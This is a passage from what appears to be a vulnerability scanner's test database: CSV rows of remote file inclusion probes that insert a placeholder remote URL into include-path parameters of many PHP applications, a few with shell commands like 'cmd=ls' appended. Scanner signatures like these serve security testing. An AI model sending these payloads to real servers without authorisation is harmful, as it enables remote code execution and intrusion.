(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005137\",\"5292\",\"c\",\"/index.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005138\",\"5292\",\"c\",\"/index.php?plugin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005139\",\"5292\",\"c\",\"/index.php?principal=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005140\",\"5292\",\"c\",\"/index.php?proMod=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005141\",\"5292\",\"c\",\"/index.php?proMod=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005142\",\"5292\",\"c\",\"/index.php?project=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005143\",\"5292\",\"c\",\"/index.php?repinc=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005144\",\"5292\",\"c\",\"/index.php?root_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005145\",\"5292\",\"c\",\"/index.php?root_prefix=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005146\",\"5292\",\"c\",\"/index.php?section=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005147\",\"5292\",\"c\",\"/index.php?site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005148\",\"5292\",\"c\",\"/index.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005149\",\"5292\",\"c\",\"/index.php?styl[top]=@RFIURL??\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005150\",\"5292\",\"c\",\"/index.php?template=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005151\",\"5292\",\"c\",\"/index.php?templates_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005152\",\"5292\",\"c\",\"/index.php?theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005153\",\"5292\",\"c\",\"/index.php?themepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005154\",\"5292\",\"c\",\"/index.php?themesdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005155\",\"5292\",\"c\",\"/index.php?this_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005156\",\"5292\",\"c\",\"/index.php?txt=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005157\",\"5292\",\"c\",\"/index.php?up=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005158\",\"5292\",\"c\",\"/index.php?url=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005159\",\"5292\",\"c\",\"/index.php?w=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005160\",\"5292\",\"c\",\"/index.php?way=@RFIURL??????????????\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005161\",\"5292\",\"c\",\"/index1.php?=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005162\",\"5292\",\"c\",\"/index1.php?inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005163\",\"5292\",\"c\",\"/index1.php?inhalt=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005164\",\"5292\",\"c\",\"/index2.php?=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005165\",\"5292\",\"c\",\"/index2.php?content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005166\",\"5292\",\"c\",\"/index2.php?s=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005167\",\"5292\",\"c\",\"/index2.php?x=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005168\",\"5292\",\"c\",\"/indexinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005169\",\"5292\",\"c\",\"/indexk.php?lib_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005170\",\"5292\",\"c\",\"/info.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005171\",\"5292\",\"c\",\"/inhalt.php?dateien[news]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005172\",\"5292\",\"c\",\"/init.php?API_HOME_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005173\",\"5292\",\"c\",\"/init.php?scriptpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005174\",\"5292\",\"c\",\"/initialize.php?hmail_config[includepath]=@RFIURL&cmd=dir\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005175\",\"5292\",\"c\",\"/initiate.php?abs_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005176\",\"5292\",\"c\",\"/install.php?_NE[AbsPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005177\",\"5292\",\"c\",\"/install.php?install_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005178\",\"5292\",\"c\",\"/install/config.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005179\",\"5292\",\"c\",\"/install/di.php?pathtoserverdata=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005180\",\"5292\",\"c\",\"/install/index.php?content_php=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005181\",\"5292\",\"c\",\"/install/install3.php?database=none&cabsolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005182\",\"5292\",\"c\",\"/integration/shortstat/configuration.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005183\",\"5292\",\"c\",\"/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005184\",\"5292\",\"c\",\"/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005185\",\"5292\",\"c\",\"/interface/billing/billing_process.php?srcdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005186\",\"5292\",\"c\",\"/interface/editors/-custom.php?bField[bf_data]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005187\",\"5292\",\"c\",\"/interface/editors/custom.php?bField[bf_data]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005188\",\"5292\",\"c\",\"/interface/new/new_patient_save.php?srcdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005189\",\"5292\",\"c\",\"/intern/admin/?rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005190\",\"5292\",\"c\",\"/intern/admin/other/backup.php?admin=1&rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005191\",\"5292\",\"c\",\"/intern/clan/member_add.php?rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005192\",\"5292\",\"c\",\"/intern/config/forum.php?rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005193\",\"5292\",\"c\",\"/intern/config/key_2.php?rootdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005194\",\"5292\",\"c\",\"/ip.inc.php?type=1&cgipath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005195\",\"5292\",\"c\",\"/ipeer_site/?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005196\",\"5292\",\"c\",\"/joinus.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005197\",\"5292\",\"c\",\"/joinus.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005198\",\"5292\",\"c\",\"/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005199\",\"5292\",\"c\",\"/joomla_path/components/com_articles.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005200\",\"5292\",\"c\",\"/js/bbcodepress/bbcode-form.php?BBCODE_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005201\",\"5292\",\"c\",\"/js/wptable-tinymce.php?ABSPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005202\",\"5292\",\"c\",\"/jscript.php?my_ms[root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005203\",\"5292\",\"c\",\"/kernel/class/ixpts.class.php?IXP_ROOT_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005204\",\"5292\",\"c\",\"/kernel/loadkernel.php?installPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005205\",\"5292\",\"c\",\"/kmitaadmin/kmitam/htmlcode.php?file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005206\",\"5292\",\"c\",\"/kmitaadmin/kmitat/htmlcode.php?file=@RFIURL? \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005207\",\"5292\",\"c\",\"/ktmlpro/includes/ktedit/toolbar.php?dirDepth=@RFIURL \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005208\",\"5292\",\"c\",\"/lang/leslangues.php?fichier=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005209\",\"5292\",\"c\",\"/lang_english/lang_main_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005210\",\"5292\",\"c\",\"/language/lang_english/lang_activity.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005211\",\"5292\",\"c\",\"/language/lang_english/lang_admin_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005212\",\"5292\",\"c\",\"/language/lang_german/lang_admin_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005213\",\"5292\",\"c\",\"/language/lang_german/lang_main_album.php?phpbb_root_path=@RFIURL?a=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005214\",\"5292\",\"c\",\"/latestposts.php?forumspath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005215\",\"5292\",\"c\",\"/latex.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005216\",\"5292\",\"c\",\"/layout/default/params.php?gConf[dir][layouts]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005217\",\"5292\",\"c\",\"/ldap/authldap.php?includePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005218\",\"5292\",\"c\",\"/learnPath/include/scormExport.inc.php?includePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005219\",\"5292\",\"c\",\"/lib.editor.inc.php?sys_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005220\",\"5292\",\"c\",\"/lib/Loggix/Module/Calendar.php?pathToIndex=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005221\",\"5292\",\"c\",\"/lib/Loggix/Module/Comment.php?pathToIndex=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005222\",\"5292\",\"c\",\"/lib/Loggix/Module/Rss.php?pathToIndex=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005223\",\"5292\",\"c\",\"/lib/Loggix/Module/Trackback.php?pathToIndex=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005224\",\"5292\",\"c\",\"/lib/action/rss.php?lib=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005225\",\"5292\",\"c\",\"/lib/activeutil.php?set[include_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005226\",\"5292\",\"c\",\"/lib/addressbook.php?GLOBALS[basedir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005227\",\"5292\",\"c\",\"/lib/armygame.php?libpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005228\",\"5292\",\"c\",\"/lib/authuser.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005229\",\"5292\",\"c\",\"/lib/base.php?BaseCfg[BaseDir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005230\",\"5292\",\"c\",\"/lib/connect.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005231\",\"5292\",\"c\",\"/lib/connected_users.lib.php3?ChatPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005232\",\"5292\",\"c\",\"/lib/connected_users.lib.php3?ChatPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005233\",\"5292\",\"c\",\"/lib/db/mysql.class.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005234\",\"5292\",\"c\",\"/lib/db/postgres.class.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005235\",\"5292\",\"c\",\"/lib/functions.php?DOC_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005236\",\"5292\",\"c\",\"/lib/googlesearch/GoogleSearch.php?APP[path][lib]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005237\",\"5292\",\"c\",\"/lib/header.php?DOC_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005238\",\"5292\",\"c\",\"/lib/language.php?_LIB_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005239\",\"5292\",\"c\",\"/lib/live_status.lib.php?ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005240\",\"5292\",\"c\",\"/lib/misc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005241\",\"5292\",\"c\",\"/lib/nl/nl.php?g_strRootDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005242\",\"5292\",\"c\",\"/lib/obj/collection.class.php?GLOBALS[application][app_root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005243\",\"5292\",\"c\",\"/lib/obj/content_image.class.php?GLOBALS[application][app_root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005244\",\"5292\",\"c\",\"/lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005245\",\"5292\",\"c\",\"/lib/pcltrace.lib.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005246\",\"5292\",\"c\",\"/lib/rs.php?rootpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005247\",\"5292\",\"c\",\"/lib/selectlang.php?BBC_LANGUAGE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005248\",\"5292\",\"c\",\"/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005249\",\"5292\",\"c\",\"/lib/smarty/SmartyFU.class.php?system[smarty][dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005250\",\"5292\",\"c\",\"/lib/static/header.php?set_menu=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005251\",\"5292\",\"c\",\"/lib/tpl.inc.php?conf[classpath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005252\",\"5292\",\"c\",\"/libraries/comment/postComment.php?path[cb]=@RFIURL?a=\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005253\",\"5292\",\"c\",\"/libraries/database.php?path=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005254\",\"5292\",\"c\",\"/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005255\",\"5292\",\"c\",\"/libraries/pcl/pcltar.php?g_pcltar_lib_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005256\",\"5292\",\"c\",\"/library/authorize.php?login_form=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 